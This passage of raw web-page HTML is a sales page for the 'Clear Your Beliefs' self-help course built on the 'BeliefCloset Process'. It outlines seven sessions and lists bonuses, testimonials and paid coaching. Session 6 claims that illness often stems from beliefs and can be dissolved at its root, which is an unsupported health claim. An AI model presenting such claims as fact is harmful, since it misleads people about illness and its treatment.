questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of 